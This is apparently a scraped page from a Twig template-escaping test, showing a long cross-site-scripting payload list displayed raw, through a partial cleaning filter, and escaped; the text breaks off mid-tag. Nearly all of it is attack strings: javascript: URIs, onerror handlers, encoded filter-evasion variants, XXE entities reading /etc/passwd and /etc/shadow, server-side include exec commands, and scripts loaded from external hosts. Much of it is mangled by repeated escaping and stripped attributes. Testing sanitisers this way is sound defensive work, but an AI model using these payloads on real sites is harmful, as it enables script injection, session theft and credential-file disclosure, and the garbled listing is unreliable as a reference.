SRC=java\\\\0script:alert&#40;\\\\\\\";XSS\\\\\\\";&#41;&gt;;\\\\\\\";;' &gt;; out\\r\\nperl -e 'print \\\\\\\";&lt;;SCR\\\\0IPT&gt;;alert&#40;\\\\\\\";XSS\\\\\\\";&#41;&lt;;/SCR\\\\0IPT&gt;;\\\\\\\";;' &gt;; out\\r\\n&lt;~/XSS/*-*/STYLE=xss:e/**/xpression(alert&#40;\\\'XSS\\\'&#41;)&gt;\\r\\n&lt;~/XSS/*-*/STYLE=xss:e/**/xpression=\\\"http://www.procheckup.com/?sid=\\\"+)&gt;\\r\\n&lt;~/XSS/*-*/STYLE=xss:e/**/xpression(alert&#40;\\\'XSS\\\'&#41;)&gt;\\r\\n&lt;~/XSS STYLE=xss:alert&#40;\\\'XSS\\\'&#41;)&gt;\\r\\n\\\"&gt;alert&#40;\\\'XSS\\\'&#41;\\r\\n&lt;/XSS/*-*/STYLE=xss:e/**/xpression(alert&#40;\\\'XSS\\\'&#41;)&gt;\\r\\nXSS/*-*/STYLE=xss:e/**/xpression(alert&#40;\\\'XSS\\\'&#41;)&gt;\\r\\nXSS STYLE=xss:e/**/xpression(alert&#40;\\\'XSS\\\'&#41;)&gt;\\r\\n&lt;/XSS STYLE=xss:alert&#40;\\\'XSS\\\'&#41;)&gt;\\r\\n&gt;\\\"&gt;alert&#40;\\\"XSS\\\"&#41;&\\r\\n\\\"&gt;&lt;STYLE&gt;@import\\\"(\\\'XSS\\\')\\\";&lt;/STYLE&gt;\\r\\n&gt;\\\"\\\'&gt;&lt;img src=(" XSS Test Successful")&gt;\\r\\n&gt;"'&gt;&lt;img src="(' XSS')"&gt;\\r\\n\\\'<script>alert&#40;\\\'XSS\\\'&#41;</script>\\\'\\r\\n\\\'\\\';!--\\\"&lt;XSS&gt;=&{()}\\r\\n&lt;IMG SRC=\\\"(\\\'XSS\\\');\\\"&gt;\\r\\n&lt;IMG SRC=(\\\'XSS\\\')&gt;\\r\\n&lt;IMG SRC=(\\\'XSS\\\')&gt;\\r\\n&lt;IMG SRC=("XSS&lt;WBR&gt;")&gt;\\r\\n&lt;IMGSRC=java&&lt;WBR&gt;#115;crip&&lt;WBR&gt;#116;:ale&&lt;WBR&gt;#114;t('XS&lt;WBR&gt;;S')&gt;\\r\\n&lt;IMGSRC=ja&&lt;WBR&gt;#0000118as&&lt;WBR&gt;#0000099ri&&lt;WBR&gt;#0000112t:&&lt;WBR&gt;#0000097le&&lt;WBR&gt;#0000114t(&&lt;WBR&gt;#0000039XS&&lt;WBR&gt;#0000083')&gt; \\r\\n&lt;IMGSRC=javas&&lt;WBR&gt;#x63ript:&&lt;WBR&gt;#x61lert(&&lt;WBR&gt;#x27XSS')&gt;\\r\\n&lt;IMG SRC=\\\"(&lt;WBR&gt;\\\'XSS\\\');\\\"&gt;\\r\\n&lt;IMG SRC=\\\"(&lt;WBR&gt;\\\'XSS\\\');\\\"&gt;\\r\\n&lt;![CDATA[var n=0;while(true){n++;}]]&gt;\\r\\n&lt;?xml version=\\\"1.0\\\" encoding=\\\"ISO-8859-1\\\"?&gt;&lt;foo&gt;&lt;![CDATA[&lt;]]&gt;SCRIPT&lt;![CDATA[&gt;]]&gt;alert&#40;\\\'gotcha\\\'&#41;;&lt;![CDATA[&lt;]]&gt;/SCRIPT&lt;![CDATA[&gt;]]&gt;&lt;/foo&gt;\\r\\n&lt;?xml version=\\\"1.0\\\" encoding=\\\"ISO-8859-1\\\"?&gt;&lt;foo&gt;&lt;![CDATA[\\\' or 1=1 or \\\'\\\'=\\\']]&gt;&lt;/foof&gt;\\r\\n&lt;?xml version=\\\"1.0\\\" encoding=\\\"ISO-8859-1\\\"?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM \\\"file://c:/boot.ini\\\"&gt;]&gt;&lt;foo&gt;&xee;&lt;/foo&gt;\\r\\n&lt;?xml version=\\\"1.0\\\" encoding=\\\"ISO-8859-1\\\"?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM \\\"file:///etc/passwd\\\"&gt;]&gt;&lt;foo&gt;&xee;&lt;/foo&gt;\\r\\n&lt;?xml version=\\\"1.0\\\" encoding=\\\"ISO-8859-1\\\"?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM \\\"file:///etc/shadow\\\"&gt;]&gt;&lt;foo&gt;&xee;&lt;/foo&gt;\\r\\n&lt;?xml version=\\\"1.0\\\" encoding=\\\"ISO-8859-1\\\"?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM \\\"file:///dev/random\\\"&gt;]&gt;&lt;foo&gt;&xee;&lt;/foo&gt;\\r\\nalert&#40;\\\'XSS\\\'&#41;\\r\\n\\r\\n">\\r\\n&lt;IMG SRC=\\\"(\\\'XSS\\\');\\\"&gt;\\r\\n&lt;IMG SRC=("XSS")&gt;\\r\\n&lt;IMG SRC=(\\\'XSS\\\')&gt; \\r\\n&lt;img src=xss =alert&#40;1&#41;&gt;\\r\\n&lt;IMG \\\"\\\"\\\"&gt;alert&#40;\\\"XSS\\\"&#41;\\\"&gt;\\r\\n&lt;IMG SRC=(String.fromCharCode(88,83,83))&gt;\\r\\n&lt;IMG SRC=\\\"(\\\'XSS\\\');\\\"&gt;\\r\\n&lt;IMG SRC=\\\"(\\\'XSS\\\');\\\"&gt;\\r\\n&lt;IMG SRC=('XSS')&gt;\\r\\n&lt;IMG SRC=('XSS')&gt;\\r\\n&lt;IMG SRC=('XSS')&gt;\\r\\n&lt;BODY BACKGROUND=\\\"(\\\'XSS\\\')\\\"&gt;\\r\\n&lt;BODY =alert&#40;\\\'XSS\\\'&#41;&gt;\\r\\n&lt;INPUT TYPE=\\\"IMAGE\\\" SRC=\\\"(\\\'XSS\\\');\\\"&gt;\\r\\n&lt;IMG SRC=\\\"(\\\'XSS\\\')\\\"\\r\\n&lt;iframe src=http://ha.ckers.org/scriptlet.html &lt;\\r\\n&lt;alert&#40;\\\"XSS\\\"&#41;;//&lt;\\r\\n\\r\\n\\\"&gt;&lt;s\\\"+\\\"cript&gt;alert&#40;&#41;\\r\\nfooalert&#40;1&#41;\\r\\nalert&#40;1&#41;\\r\\nString.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)\\r\\n\\\';alert&#40;String.fromCharCode(88,83,83&#41;)//\\\\\\\';alert&#40;String.fromCharCode(88,83,83&#41;)//\\\";alert&#40;String.fromCharCode(88,83,83&#41;)//\\\\\\\";alert&#40;String.fromCharCode(88,83,83&#41;)//--&gt;\\\"&gt;\\\'&gt;alert&#40;String.fromCharCode(88,83,83&#41;)\\r\\n&lt;marquee =\\\'(\\\'1\\\');\\\'&gt;=(◕_◕)=</p> <p>by 11 | at 2021-08-19 09:46:32</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word"><b 0\\r\\n&lt;div id=\\\"div1\\\">&lt;input value=\\\"``&gt;</div> <div id=\\\"div2\\\"></div>\\r\\n<x \\\'=\\\"foo\\\"><x foo=\\\'><img >\\>\\r\\n<img >\\>\\r\\n\\r\\n<div >x\\r\\n&lt;? foo=\\\">\\\">\\r\\n&lt;! foo=\\\"&gt;\\\"&gt;\\r\\n&lt;/ foo=\\\"&gt;\\\"&gt;\\r\\n&lt;? foo=\\\"&gt;&lt;x foo=\\\'?&gt;\\\'&gt;\\\"&gt;\\r\\n&lt;! foo=\\\"[[[Inception]]\\\"&gt;&lt;x foo=\\\"]foo&gt;\\\"&gt;\\r\\n&lt;% foo&gt;&lt;x foo=\\\"%&gt;\\\"&gt;\\r\\n&lt;div id=d&gt;&lt;x xmlns=\\\"&gt;&lt;iframe &gt;&lt;/div&gt; \\r\\n&lt;img \\\\&gt;\\r\\n&lt;img \\\\&gt;\\r\\n&lt;img \\\\&gt;\\r\\n&lt;img \\\\&gt;\\r\\n&lt;img\\\\&gt;\\r\\n&lt;img\\\\&gt;\\r\\n&lt;img\\\\&gt;\\r\\n&lt;img\\\\&gt;\\r\\n&lt;img\\\\&gt;\\r\\n&lt;img\\\\&gt;\\r\\n&lt;img \\\\&gt;\\r\\n&lt;img \\\\&gt;\\r\\n&lt;img \\\\&gt;\\r\\n&lt;img \\\\&gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img[&gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;a &gt;XXX&lt;/a&gt;\\r\\n&lt;img &gt;(1)\\\"` `&gt;\\r\\n&lt;img &gt;\\&gt;&lt;/title&gt;&lt;title title=&gt;\\r\\n&lt;a &gt;&lt;/a&gt;&lt;img &gt;&lt;img &gt;&lt;/a&gt;\\\"&gt;\\r\\n&lt;!--[if]&gt;\\r\\n&lt;!--[if&lt;img &gt; --&gt;\\&gt;&lt;/object&gt; &lt;object classid=\\\"clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B\\\" &gt;&lt;param name=postdomevents /&gt;&lt;/object&gt;\\r\\n&lt;a &gt;X\\r\\n&lt;style&gt;p[foo=bar{}*{-o-link:\\\'(1)\\\'}{}*{-o-link-source:current}]{color:red};&lt;/style&gt;\\r\\n&lt;link rel=stylesheet href=PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\\\"&gt;\\r\\n&lt;META HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0; URL=http://;URL=(\\\'XSS\\\');\\\"&gt;\\r\\n&lt;IFRAME SRC=\\\"(\\\'XSS\\\');\\\"&gt;&lt;/IFRAME&gt;\\r\\n&lt;IFRAME SRC=# &gt;&lt;/IFRAME&gt;\\r\\n&lt;FRAMESET&gt;&lt;FRAME SRC=\\\"(\\\'XSS\\\');\\\"&gt;&lt;/FRAMESET&gt;\\r\\n&lt;TABLE BACKGROUND=\\\"(\\\'XSS\\\')\\\"&gt;\\r\\n&lt;TABLE&gt;&lt;TD BACKGROUND=\\\"(\\\'XSS\\\')\\\"&gt;\\r\\n&lt;DIV url((\\\'XSS\\\'))\\\"&gt;\\r\\n&lt;DIV &gt;\\r\\n&lt;DIV url(&#1;(\\\'XSS\\\'))\\\"&gt;\\r\\n&lt;DIV alert&#40;\\\'XSS\\\'&#41;);\\\"&gt;\\r\\n&lt;BASE HREF=\\\"(\\\'XSS\\\');//\\\"&gt;\\r\\n &lt;OBJECT TYPE=\\\"text/x-scriptlet\\\" DATA=\\\"http://ha.ckers.org/scriptlet.html\\\"&gt;&lt;/OBJECT&gt;\\r\\n&lt;EMBED SRC=\\\PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\\\" type=\\\"image/svg+xml\\\" AllowScriptAccess=\\\"always\\\"&gt;&lt;/EMBED&gt;\\r\\n\\r\\n&lt;!--#exec cmd=\\\"/bin/echo \\\'&lt;SCR\\\'\\\"--&gt;&lt;!--#exec cmd=\\\"/bin/echo \\\'IPT SRC=http://ha.ckers.org/xss.js&gt;\\\'\\\"--&gt;\\r\\n&lt;? echo(\\\'&lt;SCR)\\\';echo(\\\'IPT&gt;alert&#40;\\\"XSS\\\"&#41;\\\'); ?&gt;\\r\\n&lt;IMG &gt;\\&gt;\\r\\n &lt;HEAD&gt;&lt;META HTTP-EQUIV=\\\"CONTENT-TYPE\\\" CONTENT=\\\"text/html; charset=UTF-7\\\"&gt; &lt;/HEAD&gt;\\r\\n\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\"&gt;\\r\\n\\r\\n\\\" \\\'\\\' SRC=\\\"http://ha.ckers.org/xss.js\\\"&gt;\\r\\n\\\'\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\"&gt;\\r\\n` SRC=\\\"http://ha.ckers.org/xss.js\\\"&gt;\\r\\n\\\'&gt;\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\"&gt;\\r\\nPT SRC=\\\"http://ha.ckers.org/xss.js\\\"&gt;\\r\\n&lt;A &gt;XSS&lt;/A&gt;\\r\\n&lt;A &gt;XSS&lt;/A&gt;\\r\\n&lt;A &gt;XSS&lt;/A&gt;\\r\\n&lt;A &gt;XSS&lt;/A&gt;\\r\\n&lt;A &gt;XSS&lt;/A&gt;\\r\\n&lt;A &gt;XSS&lt;/A&gt;\\r\\n&lt;iframe src=\\\" (1) \\\"&gt;\\r\\n&lt;svg&gt;&lt;style&gt;{font-family:\\\'&lt;iframe/&gt;\\\'\\r\\n&lt;input/&gt;&lt;isindex &gt;\\&gt;\\&gt;\\\"&gt;\\/&gt;\\r\\n&lt;svg&gt;\r\\n&lt;svg&gt;\\r\\n&lt;iframe src=)&gt;\\r\\n&lt;form&gt;&lt;a &gt;X\\r\\n&lt;img/*/&gt;\\r\\n&lt;img/ &#11; &gt;\\r\\n&lt;form&gt;&lt;iframe &#11; src=\\\"(1)\\\"&#11; ;&gt;\\r\\n&lt;a &gt;X&lt;/a\\r\\nhttp://www.googlealert)\r\\n&lt;a &gt;XYZ&lt;/a\\r\\n&lt;img/&gt;alert&#40;String.fromCharCode(49&#41;)^__^\\r\\n&lt;/style &gt;&lt;input type=\\\"date\\\" &gt;\\r\\n&lt;form&gt;&lt;textarea &#13; &gt;\\r\\n\\r\\n&lt;a &gt;X&lt;/a&gt;\\r\\n\\r\\n&lt;style/ &gt; alert &#40;1&#41;&gt;\\r\\n&lt;///style///&gt;&lt;span / &gt;SPAN\\r\\n&lt;img/&gt;&lt;svg&gt;&lt;style&gt;{-o-link-source:\\\'&lt;body/&gt;\\\'\\r\\n&#13;&lt;blink/&#13; &gt;OnMouseOver {Firefox & Opera}\\r\\n&lt;marquee &gt;^__^\\r\\n&lt;div/&gt;X&lt;/div&gt; {IE7}\\r\\n&lt;iframe// src=(1)\\r\\n//&lt;form/action=()&gt;&lt;input/type=\\\'submit\\\'&gt;//\\r\\n/*iframe/src*/&lt;iframe/src=\\\"&lt;iframe/src=@\\\"/ /*iframe/src*/&gt;\\r\\n//|\\\\\\\\ //|\\\\\\\\ //|\\\\\\\\\\r\\n&lt;/font&gt;/&lt;svg&gt;&lt;style&gt;{src:\\\'&lt;style/&gt;\\\'&lt;/font&gt;/&lt;/style&gt;\\r\\n&lt;a/&gt;&lt;input type=\\\"X\\\"&gt;\\r\\n&lt;/plaintext\\\\&gt;&lt;/|\\\\&gt;&lt;plaintext/&gt;\\\'\\\'&lt;svg&gt;alert&#40;1&#41; {Opera}\\r\\n&lt;a &gt;&lt;button&gt;\\r\\n&lt;div &gt;DIV&lt;/div&gt;\\r\\n&lt;iframe &gt;\\r\\n&lt;a &gt;X&lt;/a&gt;\\r\\n&lt;embed src=\\\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\\\"&gt;\\r\\n&lt;object data=\\\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\\\"&gt;\\r\\n&lt;var &gt;On Mouse Over&lt;/var&gt;\\r\\n&lt;a &gt;Click Here&lt;/a&gt;\\r\\n&lt;img &gt;\\r\\n&lt;%&lt;!--\\\'%&gt;\\r\\n\\r\\n&lt;iframe/src \\\\/\\\\/ value=&lt;&gt;&lt;iframe/src=(1)\\r\\n&lt;input type=\\\"text\\\" value=`` &lt;div/&gt;X&lt;/div&gt;\\r\\n&lt;iframe src=( 1 )&gt;&lt;/iframe&gt;\\r\\n&lt;img &gt;\\&gt;&lt;/object&gt;\\r\\n&lt;meta http-equiv=\\\"refresh\\\" content=\\\"0;(1)\\\"/&gt;\\r\\n&lt;math&gt;&lt;a &gt;click\\r\\n&lt;embed code=\\\"http://businessinfo.co.uk/labs/xss/xss.swf\\\" allowscriptaccess=always&gt;\\r\\n&lt;svg contentScriptType=text/vbs&gt;\\\"&gt;X&lt;/a\\r\\n&lt;iframe/ worksinIE&gt;\\r\\na=\\\a & /=/\\r\\n\r\\n&lt;object data=\\\alert&#40;1&#41;&gt;\\r\\n\\r\\n&lt;body/ alert&#40;1&#41;&gt;\\r\\n/*\\r\\n&lt;svg&gt; alert&#40;1&#41;\\r\\n&lt;a &gt;ClickMe\\r\\n alert&#40;1&#41; 1=2\\r\\n&lt;div/&gt; style=\\\"x:\\\"&gt;\\r\\n&lt;--`&lt;img/&gt; --!&gt;\\&gt;x&lt;/button&gt;\\r\\n\\\"&gt;&lt;img &gt;\\r\\n&lt;form&gt;&lt;button &gt;CLICKME\\r\\n&lt;math&gt;&lt;a &gt;click\\r\\n&lt;object data=PHN2Zy9vbmxvYWQ9YWxlcnQoMik+&gt;&lt;/object&gt;\\r\\n&lt;iframe src=\\\"data:text/html,\\\"&gt;&lt;/iframe&gt;\\r\\n&lt;a &gt; \\\"&gt;Click Me&lt;/a&gt;\\r\\n\\\'\\\';!--\\\"&lt;XSS&gt;=&{()}\\r\\n\\\'&gt;//\\\\\\\\,&lt;\\\'&gt;\\\"&gt;\\\"&gt;\\\"*\\\"\\r\\n\\\'); alert&#40;\\\'XSS\\r\\n\\r\\n\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG \\\"\\\"\\\"&gt;\\\"&gt;\\r\\n&lt;scralert(\\\'XSS\\\'&#41;;\\r\\n \\r\\n&lt;img /&gt;\\r\\n&lt;style&gt;@im\\\\port\\\'\\\\ja\\\\vasc\\\\ript:alert&#40;\\\\\\\"XSS\\\\\\\"&#41;\\\';&lt;/style&gt;\\r\\n&lt;? echo(\\\'&lt;scr)\\\'; echo(\\\'ipt&gt;alert&#40;\\\\\\\"XSS\\\\\\\"&#41;\\\'); ?&gt;\\r\\n&lt;marquee&gt;&lt;/marquee&gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n\\\"&gt;\\r\\n\\r\\n&lt;/title&gt;\\r\\n&lt;/textarea&gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;font &gt;\\r\\n&lt;img &gt;\\&gt;\\/&gt;&lt;/a&gt;&lt;/&gt;&lt;img &gt;\\&gt;\\r\\n&lt;iframe&lt;?php echo chr(11)?&gt; &gt;&lt;/iframe&gt;\\r\\n\\\"&gt;\\r\\n\\\'&gt;&gt;&lt;marquee&gt;&lt;h1&gt;XSS&lt;/h1&gt;&lt;/marquee&gt;\\r\\n\\\'\\\"&gt;&gt;\\r\\n\\\'\\\"&gt;&gt;&lt;marquee&gt;&lt;h1&gt;XSS&lt;/h1&gt;&lt;/marquee&gt;\\r\\n&lt;META HTTP-EQUIV=\\\\\\\"refresh\\\\\\\" CONTENT=\\\\\\\"0;url=(\\\'XSS\\\');\\\\\\\"&gt;\\r\\n&lt;META HTTP-EQUIV=\\\\\\\"refresh\\\\\\\" CONTENT=\\\\\\\"0; URL=http://;URL=(\\\'XSS\\\');\\\\\\\"&gt;\\r\\n\\r\\n&lt;STYLE type=\\\"text/css\\\"&gt;BODY{background:url(\\\"(\\\'XSS\\\')\\\")}&lt;/STYLE&gt;\\r\\n&lt;?=\\\'\\\'?&gt;\\r\\n&lt;IMG &gt;\\&gt; &lt;\\\"\\r\\n&lt;FRAMESET&gt;&lt;FRAME SRC=\\\\\\\"(\\\'XSS\\\');\\\\\\\"&gt;&lt;/FRAMESET&gt;\\r\\n&lt;STYLE&gt;li {list-style-image: url(\\\\\\\"(\\\'XSS\\\')\\\\\\\");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS\\r\\nperl -e \\\'print \\\\\\\"&lt;SCR\\\\0IPT&gt;alert&#40;\\\\\\\"XSS\\\\\\\"&#41;&lt;/SCR\\\\0IPT&gt;\\\\\\\";\\\' &gt; out\\r\\nperl -e \\\'print \\\\\\\"&lt;IMG &gt;\\\\\\\";\\\' &gt; &gt;\\r\\n&lt;scrscriptipt&gt;alert&#40;1&#41;&lt;/scrscriptipt&gt;\\r\\n&lt;/br &gt;\\r\\n\\r\\n\\\"&gt;&lt;BODY !#$%&()*~+-_.,:;?@[/|\\\\]^`=alert&#40;\\\"XSS\\\"&#41;&gt;\\r\\n[color=red width=alert&#40;123&#41;)][color]\\r\\n&lt;BASE HREF=\\\"(\\\'XSS\\\');//\\\"&gt;\\r\\nExecute(MsgBox(chr(88)&chr(83)&chr(83)))&lt;\\r\\n\\\"&gt;&lt;/iframe&gt;</code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">&lt;b &lt;script&gt;alert(1)&lt;/script&gt;0\\r\\n&lt;div id=\\\&quot;div1\\\&quot;&gt;&lt;input value=\\\&quot;``onmouseover=javascript:alert(1)\\\&quot;&gt;&lt;/div&gt; &lt;div id=\\\&quot;div2\\\&quot;&gt;&lt;/div&gt;&lt;script&gt;document.getElementById(\\\&quot;div2\\\&quot;).innerHTML = document.getElementById(\\\&quot;div1\\\&quot;).innerHTML;&lt;/script&gt;\\r\\n&lt;x \\\&#039;=\\\&quot;foo\\\&quot;&gt;&lt;x foo=\\\&#039;&gt;&lt;img src=x onerror=javascript:alert(1)//\\\&#039;&gt;\\r\\n&lt;embed src=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img src=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;image src=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;script src=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;div style=width:1px;filter:glow onfilterchange=javascript:alert(1)&gt;x\\r\\n&lt;? foo=\\\&quot;&gt;&lt;script&gt;javascript:alert(1)&lt;/script&gt;\\\&quot;&gt;\\r\\n&lt;! foo=\\\&quot;&gt;&lt;script&gt;javascript:alert(1)&lt;/script&gt;\\\&quot;&gt;\\r\\n&lt;/ foo=\\\&quot;&gt;&lt;script&gt;javascript:alert(1)&lt;/script&gt;\\\&quot;&gt;\\r\\n&lt;? foo=\\\&quot;&gt;&lt;x foo=\\\&#039;?&gt;&lt;script&gt;javascript:alert(1)&lt;/script&gt;\\\&#039;&gt;\\\&quot;&gt;\\r\\n&lt;! foo=\\\&quot;[[[Inception]]\\\&quot;&gt;&lt;x foo=\\\&quot;]foo&gt;&lt;script&gt;javascript:alert(1)&lt;/script&gt;\\\&quot;&gt;\\r\\n&lt;% foo&gt;&lt;x foo=\\\&quot;%&gt;&lt;script&gt;javascript:alert(1)&lt;/script&gt;\\\&quot;&gt;\\r\\n&lt;div id=d&gt;&lt;x xmlns=\\\&quot;&gt;&lt;iframe onload=javascript:alert(1)\\\&quot;&gt;&lt;/div&gt; &lt;script&gt;d.innerHTML=d.innerHTML&lt;/script&gt;\\r\\n&lt;img \\\\x00src=x onerror=\\\&quot;alert(1)\\\&quot;&gt;\\r\\n&lt;img \\\\x47src=x onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img \\\\x11src=x onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img \\\\x12src=x onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img\\\\x47src=x onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img\\\\x10src=x onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img\\\\x13src=x onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img\\\\x32src=x onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img\\\\x47src=x onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img\\\\x11src=x onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img \\\\x47src=x onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img \\\\x34src=x onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img \\\\x39src=x onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img \\\\x00src=x onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img src\\\\x09=x onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img src\\\\x10=x onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img src\\\\x13=x onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img src\\\\x32=x onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img src\\\\x12=x onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img src\\\\x11=x onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img src\\\\x00=x onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img src\\\\x47=x onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img src=x\\\\x09onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img src=x\\\\x10onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img src=x\\\\x11onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img src=x\\\\x12onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img src=x\\\\x13onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img[a][b][c]src[d]=x[e]onerror=[f]\\\&quot;alert(1)\\\&quot;&gt;\\r\\n&lt;img src=x onerror=\\\\x09\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img src=x onerror=\\\\x10\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img src=x onerror=\\\\x11\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img src=x onerror=\\\\x12\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img src=x onerror=\\\\x32\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img src=x onerror=\\\\x00\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;a href=java&amp;#1&amp;#2&amp;#3&amp;#4&amp;#5&amp;#6&amp;#7&amp;#8&amp;#11&amp;#12script:javascript:alert(1)&gt;XXX&lt;/a&gt;\\r\\n&lt;img src=\\\&quot;x` `&lt;script&gt;javascript:alert(1)&lt;/script&gt;\\\&quot;` `&gt;\\r\\n&lt;img src onerror /\\\&quot; \\\&#039;\\\&quot;= alt=javascript:alert(1)//\\\&quot;&gt;\\r\\n&lt;title onpropertychange=javascript:alert(1)&gt;&lt;/title&gt;&lt;title title=&gt;\\r\\n&lt;a href=http://foo.bar/#x=`y&gt;&lt;/a&gt;&lt;img alt=\\\&quot;`&gt;&lt;img src=x:x onerror=javascript:alert(1)&gt;&lt;/a&gt;\\\&quot;&gt;\\r\\n&lt;!--[if]&gt;&lt;script&gt;javascript:alert(1)&lt;/script --&gt;\\r\\n&lt;!--[if&lt;img src=x onerror=javascript:alert(1)//]&gt; --&gt;\\r\\n&lt;script src=\\\&quot;/\\\\%(jscript)s\\\&quot;&gt;&lt;/script&gt;\\r\\n&lt;script src=\\\&quot;\\\\\\\\%(jscript)s\\\&quot;&gt;&lt;/script&gt;\\r\\n&lt;object id=\\\&quot;x\\\&quot; classid=\\\&quot;clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598\\\&quot;&gt;&lt;/object&gt; &lt;object classid=\\\&quot;clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B\\\&quot; onqt_error=\\\&quot;javascript:alert(1)\\\&quot; style=\\\&quot;behavior:url(#x);\\\&quot;&gt;&lt;param name=postdomevents /&gt;&lt;/object&gt;\\r\\n&lt;a 